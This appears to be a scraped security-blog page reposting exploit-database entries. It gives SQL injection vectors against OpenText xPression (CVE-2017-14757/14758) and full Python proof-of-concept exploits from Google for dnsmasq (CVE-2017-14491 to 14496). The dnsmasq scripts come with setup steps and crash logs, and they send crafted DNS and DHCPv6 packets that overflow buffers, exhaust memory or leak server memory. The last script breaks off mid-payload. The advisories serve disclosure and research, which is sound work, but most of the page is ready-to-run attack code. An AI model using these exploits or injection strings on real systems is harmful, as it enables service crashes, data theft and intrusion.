Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14757
Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)
Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)
SQL Injection:
==============
Due to lack of prepared statements an application is prone to SQL
Injection attacks.
Potential attacker can retrieve data from application database by
exploiting the issue.
Vector :
--------
True: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1
False: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=2
Additionally:
http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa
Results in the following error in response:
HTTP/1.1 200 OK
[...]
<b>Errors: </b>
See nested exception; nested exception is:
java.lang.RuntimeException:
com.dsc.uniarch.cr.error.CRException: CRReportingSL: Method
getJobRunsByIds did not succeed because of a database operation
failure.;
	---> nested com.dsc.uniarch.cr.error.CRSyntaxException:
Database syntax error :SELECT JOBRUN_ID, JOB_NAME,
PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, END_TIME, HAS_DISTRIBUTION,
DISTRIBUTION_NUMBER, STATUS, ERROR, REPORTING_LEVEL, THREAD_ID, JOB_ID
FROM T_JOBRUN WHERE
JOBRUN_ID=1502642747222443244706554841153aaa.;
	---> nested java.sql.SQLSyntaxErrorException:
ORA-00933: SQL command not properly ended
An attacker can see whole query and injection point. This can also be
used for error-based data extraction.
Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774
Contact:
========
mw[at]nme[dot]pl
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863543883
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - SQL Injection
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14758
Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)
Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)
SQL Injection:
==============
Due to lack of prepared statements an application is prone to SQL
Injection attacks.
Potential attacker can retrieve data from application database by
exploiting the issue.
Vector :
--------
https://[...]/xAdmin/html/cm_doclist_view_uc.jsp?cat_id=503&documentId=185365177756%20and%201=1&documentType=xDesignPublish&documentName=ContractRealEstate
^
Results can be retrieved using blind SQL injection method.
Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774
Contact:
========
mw[at]nme[dot]pl
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14491.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
1) Build the docker and open three terminals
docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp poc.py dnsmasq_test:/poc.py
docker exec -it <container_id> bash
docker exec -it <container_id> bash
2) On one terminal let’s launch attacker controlled DNS server:
# python poc.py 127.0.0.2 53
Listening at 127.0.0.2:53
3) On another terminal let’s launch dnsmasq forwarding queries to attacker controlled DNS:
# /testing/dnsmasq/src/dnsmasq -p 53535 --no-daemon --log-queries -S 127.0.0.2 --no-hosts --no-resolv
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq: using nameserver 127.0.0.2#53
dnsmasq: cleared cache
4) Let’s fake a client making a request twice (or more) so we hit the dnsmasq cache:
# dig @localhost -p 53535 -x 8.8.8.125 > /dev/null
# dig @localhost -p 53535 -x 8.8.8.125 > /dev/null
5) The crash might not be triggered on the first try due to the non-deterministic order of the dnsmasq cache. Restarting dnsmasq and retrying should be sufficient to trigger a crash.
==1159==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62200001dd0b at pc 0x0000005105e7 bp 0x7fff6165b9b0 sp 0x7fff6165b9a8
WRITE of size 1 at 0x62200001dd0b thread T0
#0 0x5105e6 in add_resource_record /test/dnsmasq/src/rfc1035.c:1141:7
#1 0x5127c8 in answer_request /test/dnsmasq/src/rfc1035.c:1428:11
#2 0x534578 in receive_query /test/dnsmasq/src/forward.c:1439:11
#3 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2
#4 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7
#5 0x7fdf4b3972b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
0x62200001dd0b is located 0 bytes to the right of 5131-byte region [0x62200001c900,0x62200001dd0b)
allocated by thread T0 here:
#0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
#1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
#2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20
#3 0x7fdf4b3972b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: heap-buffer-overflow /test/dnsmasq/src/rfc1035.c:1141:7 in add_resource_record
Shadow bytes around the buggy address:
0x0c447fffbb50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c447fffbb90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c447fffbba0: 00[03]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbe0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c447fffbbf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==1159==ABORTING
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
import socket
import struct
import sys
def dw(x):
return struct.pack('>H', x)
def udp_handler(sock_udp):
data, addr = sock_udp.recvfrom(1024)
print '[UDP] Total Data len recv ' + str(len(data))
id = struct.unpack('>H', data[0:2])[0]
query = data[12:]
data = dw(id) # id
data += dw(0x85a0) # flags
data += dw(1) # questions
data += dw(0x52) # answers
data += dw(0) # authoritative
data += dw(0) # additional
# Add the question back - we're just hardcoding it
data += ('\x03125\x018\x018\x018\x07in-addr\x04arpa\x00' +
'\x00\x0c' + # type = 'PTR'
'\x00\x01') # cls = 'IN'
# Add the first answer
data += ('\xc0\x0c' + # ptr to the name
'\x00\x0c' + # type = 'PTR'
'\x00\x01' + # cls = 'IN'
'\x00\x00\x00\x3d' + # ttl
'\x04\x00' + # size of this resource record
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x3e' + 'Z'*62 +
'\x0e' + 'Z'*14 +
'\x00')
# Add the next answer, which is written out in full
data += ('\xc0\x0c' + # ptr to the name
'\x00\x0c' + # type = 'PTR'
'\x00\x01' + # cls = 'IN'
'\x00\x00\x00\x3d' + # ttl
'\x00\x26' + # size of this resource record
'\x08DCBBEEEE\x04DDDD\x08CCCCCCCC\x04AAAA\x04BBBB\x03com\x00')
for _ in range(79):
data += ('\xc0\x0c' + # ptr to the name
'\x00\x0c' + # type = 'PTR'
'\x00\x01' + # cls = 'IN'
'\x00\x00\x00\x3d' + # ttl
'\x00\x02' + # size of the compressed resource record
'\xc4\x40') # pointer to the second record's name
data += ('\xc0\x0c' + # ptr to the name
'\x00\x0c' + # type = 'PTR'
'\x00\x01' + # cls = 'IN'
'\x00\x00\x00\x3d' + # ttl
'\x00\x11' + # size of this resource record
'\x04EEEE\x09DAABBEEEE\xc4\x49')
sock_udp.sendto(data, addr)
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <ip> <port>\n' % sys.argv[0]
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_udp.bind((ip, port))
print 'Listening at %s:%d\n' % (ip, port)
while True:
udp_handler(sock_udp)
sock_udp.close()
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14492.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
1) Build the docker and open two terminals
docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp poc.py dnsmasq_test:/poc.py
docker exec -it <container_id> bash
2) On one terminal start dnsmasq:
# /test/dnsmasq_noasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff --enable-ra
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq-dhcp: DHCPv6, IP range fd00::2 -- fd00::ff, lease time 1h
dnsmasq-dhcp: router advertisement on fd00::
dnsmasq-dhcp: IPv6 router advertisement enabled
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: using nameserver 8.8.4.4#53
dnsmasq: read /etc/hosts - 7 addresses
3) On another terminal start the PoC:
# python /poc.py ::1 547
[+] sending 2050 bytes to ::1
4) Dnsmasq will output the following: Segmentation fault (core dumped)
==556==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61900000ea81 at pc 0x00000049628a bp 0x7ffd60a28a20 sp 0x7ffd60a281d0
WRITE of size 4 at 0x61900000ea81 thread T0
#0 0x496289 in __interceptor_vsprintf (/test/dnsmasq/src/dnsmasq+0x496289)
#1 0x4964d2 in __interceptor_sprintf (/test/dnsmasq/src/dnsmasq+0x4964d2)
#2 0x519538 in print_mac /test/dnsmasq/src/util.c:593:12
#3 0x586e6a in icmp6_packet /test/dnsmasq/src/radv.c:201:4
#4 0x544af4 in main /test/dnsmasq/src/dnsmasq.c:1064:2
#5 0x7f0d52e312b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
0x61900000ea81 is located 0 bytes to the right of 1025-byte region [0x61900000e680,0x61900000ea81)
allocated by thread T0 here:
#0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
#1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
#2 0x51cb14 in read_opts /test/dnsmasq/src/option.c:4615:16
#3 0x541783 in main /test/dnsmasq/src/dnsmasq.c:89:3
#4 0x7f0d52e312b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/test/dnsmasq/src/dnsmasq+0x496289) in __interceptor_vsprintf
Shadow bytes around the buggy address:
0x0c327fff9d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c327fff9d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c327fff9d50:[01]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c327fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==556==ABORTING
'''
#!/usr/bin/env python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
from struct import pack
import socket
import sys
ND_ROUTER_SOLICIT = 133
ICMP6_OPT_SOURCE_MAC = 1
def u8(x):
return pack("B", x)
def send_packet(data, host):
print("[+] sending {} bytes to {}".format(len(data), host))
s = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_ICMPV6)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
if s.sendto(data, (host, 0)) != len(data):
print("[!] Could not send (full) payload")
s.close()
if __name__ == '__main__':
assert len(sys.argv) == 2, "Run via {} <IPv6>".format(sys.argv[0])
host, = sys.argv[1:]
pkg = b"".join([
u8(ND_ROUTER_SOLICIT), # type
u8(0), # code
b"X" * 2, # checksum
b"\x00" * 4, # reserved
u8(ICMP6_OPT_SOURCE_MAC), # hey there, have our mac
u8(255), # Have 255 MACs!
b"A" * 255 * 8,
])
send_packet(pkg, host)
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14493.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
1) Build the docker and open two terminals
docker build -t dnsmasq .
docker run --rm -t -i --name dnsmasq_test dnsmasq bash
docker cp poc.py dnsmasq_test:/poc.py
docker exec -it <container_id> bash
2) On one terminal start dnsmasq:
# /test/dnsmasq_noasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff
dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
dnsmasq-dhcp: DHCPv6, IP range fd00::2 -- fd00::ff, lease time 1h
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: using nameserver 8.8.4.4#53
dnsmasq: read /etc/hosts - 7 addresses
3) On another terminal start the PoC:
# python /poc.py ::1 547
[+] sending 70 bytes to ::1:547
4) Dnsmasq will output the following: Segmentation fault (core dumped)
==33==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffcbef81470 at pc 0x0000004b5408 bp 0x7ffcbef81290 sp 0x7ffcbef80a40
WRITE of size 30 at 0x7ffcbef81470 thread T0
#0 0x4b5407 in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b5407)
#1 0x575d38 in dhcp6_maybe_relay /test/dnsmasq/src/rfc3315.c:211:7
#2 0x575378 in dhcp6_reply /test/dnsmasq/src/rfc3315.c:103:7
#3 0x571080 in dhcp6_packet /test/dnsmasq/src/dhcp6.c:233:14
#4 0x544a82 in main /test/dnsmasq/src/dnsmasq.c:1061:2
#5 0x7f93e5da62b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
Address 0x7ffcbef81470 is located in stack of thread T0 at offset 208 in frame
#0 0x57507f in dhcp6_reply /test/dnsmasq/src/rfc3315.c:78
This frame has 1 object(s):
[32, 208) 'state' <== Memory access at offset 208 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/test/dnsmasq/src/dnsmasq+0x4b5407) in __asan_memcpy
Shadow bytes around the buggy address:
0x100017de8230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de8240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de8250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de8260: f1 f1 f1 f1 00 00 f3 f3 00 00 00 00 00 00 00 00
0x100017de8270: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00
=>0x100017de8280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f3]f3
0x100017de8290: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00
0x100017de82a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100017de82b0: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
0x100017de82c0: 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2
0x100017de82d0: 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==33==ABORTING
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
from struct import pack
import sys
import socket
def send_packet(data, host, port):
print("[+] sending {} bytes to {}:{}".format(len(data), host, port))
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
if s.sendto(data, (host, port)) != len(data):
print("[!] Could not send (full) payload")
s.close()
def u8(x):
return pack("B", x)
def u16(x):
return pack("!H", x)
def gen_option(option, data, length=None):
if length is None:
length = len(data)
return b"".join([
u16(option),
u16(length),
data
])
if __name__ == '__main__':
assert len(sys.argv) == 3, "{} <ip> <port>".format(sys.argv[0])
pkg = b"".join([
u8(12), # DHCP6RELAYFORW
u16(0x0313), u8(0x37), # transaction ID
b"_" * (34 - 4),
# Option 79 = OPTION6_CLIENT_MAC
# Moves argument into char[DHCP_CHADDR_MAX], DHCP_CHADDR_MAX = 16
gen_option(79, "A" * 74 + pack("<Q", 0x1337DEADBEEF)),
])
host, port = sys.argv[1:]
send_packet(pkg, host, int(port))
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14495.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet.
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwin <gynvael@google.com>
# Ron Bowes - Xoogler :/
import socket
import sys
def oom():
data = '''01 0d 08 1b 00 01 00 00 00 00 00 02 00 00 29 04
00 00 29 00 00 00 03 00 00 01 13 00 08 01 13 79
00 00 00 00 00
'''.replace(' ', '').replace('\n', '').decode('hex')
data = data.replace('\x00\x01\x13\x00', '\x7f\x00\x00\x01')
return data
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <ip> <port>' % sys.argv[0]
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
packet = oom()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
while True:
s.sendto(packet, (ip, port))
#break
s.close()
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14494.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
Sadly, there are no easy docker setup instructions available.
Setup a simple network with dnsmasq as dhcpv6 server. Run any dhcpv6 client on the clients machine and obtain the network packets. Look for the server identifier inside the dhcpv6 packets. Then, run the poc on the client:
# python /poc.py <ipv6 addr> <server id, hexencoded>
The poc will create a response.bin file with 32k bytes worth of ram, beginning at the buffer + 38.
'''
#!/usr/bin/env python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
from binascii import unhexlify
from struct import pack
import socket
import sys
# num bytes to leak. < 0xFFFF, exact upper limit not tested.
N_BYTES = 0x8000
def send_packet(data, host, port):
print("[+] sending {} bytes to [{}]:{}".format(len(data), host, port))
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
if s.sendto(data, (host, port)) != len(data):
print("[!] Could not send (full) payload")
s.close()
def u8(x):
return pack("B", x)
def u16(x):
return pack("!H", x)
def gen_option(option, data, length=None):
if length is None:
length = len(data)
return b"".join([
u16(option),
u16(length),
data
])
def inner_pkg(duid):
OPTION6_SERVER_ID = 2
return b"".join([
u8(5), # Type = DHCP6RENEW
u8(0), u16(1337), # ID
gen_option(OPTION6_SERVER_ID, duid),
gen_option(1, "", length=(N_BYTES - 8 - 18)) # Client ID
])
if __name__ == '__main__':
assert len(sys.argv) == 2, "{} <ip> <duid>".format(sys.argv[0])
# No automated way to obtain a duid, sorry. Not a programming contest after all.
host, duid = sys.argv[1:]
duid = unhexlify(duid)
assert len(duid) == 14
pkg = b"".join([
u8(12), # DHCP6RELAYFORW
'?',
# Client addr
'\xFD\x00',
'\x00\x00' * 6,
'\x00\x05',
'_' * (33 - 17), # Skip random data.
# Option 9 - OPTION6_RELAY_MSG
gen_option(9, inner_pkg(duid), length=N_BYTES),
])
# Setup receiving port
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, N_BYTES)
s.bind(('::', 547))
# Send request
send_packet(pkg, host, 547)
# Dump response
with open('response.bin', 'wb') as f:
f.write(s.recvfrom(N_BYTES)[0])
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14496.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet.
=================================================================
==2215==ERROR: AddressSanitizer: negative-size-param: (size=-4)
#0 0x4b55be in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b55be)
#1 0x59a70e in add_pseudoheader /test/dnsmasq/src/edns0.c:164:8
#2 0x59bae8 in add_edns0_config /test/dnsmasq/src/edns0.c:424:12
#3 0x530b6b in forward_query /test/dnsmasq/src/forward.c:407:20
#4 0x534699 in receive_query /test/dnsmasq/src/forward.c:1448:16
#5 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2
#6 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7
#7 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#8 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
0x62200001ca2e is located 302 bytes inside of 5131-byte region [0x62200001c900,0x62200001dd0b)
allocated by thread T0 here:
#0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
#1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
#2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20
#3 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: negative-size-param (/test/dnsmasq/src/dnsmasq+0x4b55be) in __asan_memcpy
==2215==ABORTING
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwin <gynvael@google.com>
# Ron Bowes - Xoogler :/
import socket
import sys
def negative_size_param():
data = '''00 00 00 00 00 00 00 00 00 00 00 04
00 00 29 00 00 3a 00 00 00 01 13 fe 32 01 13 79
00 00 00 00 00 00 00 01 00 00 00 61 00 08 08 08
08 08 08 08 08 08 08 08 08 08 08 00 00 00 00 00
00 00 00 6f 29 fb ff ff ff 00 00 00 00 00 00 00
00 00 03 00 00 00 00 00 00 00 00 02 8d 00 00 00
f9 00 00 00 00 00 00 00 00 00 00 00 5c 00 00 00
01 ff ff 00 35 13 01 0d 06 1b 00 00 00 00 00 00
00 00 00 00 00 04 00 00 29 00 00 3a 00 00 00 01
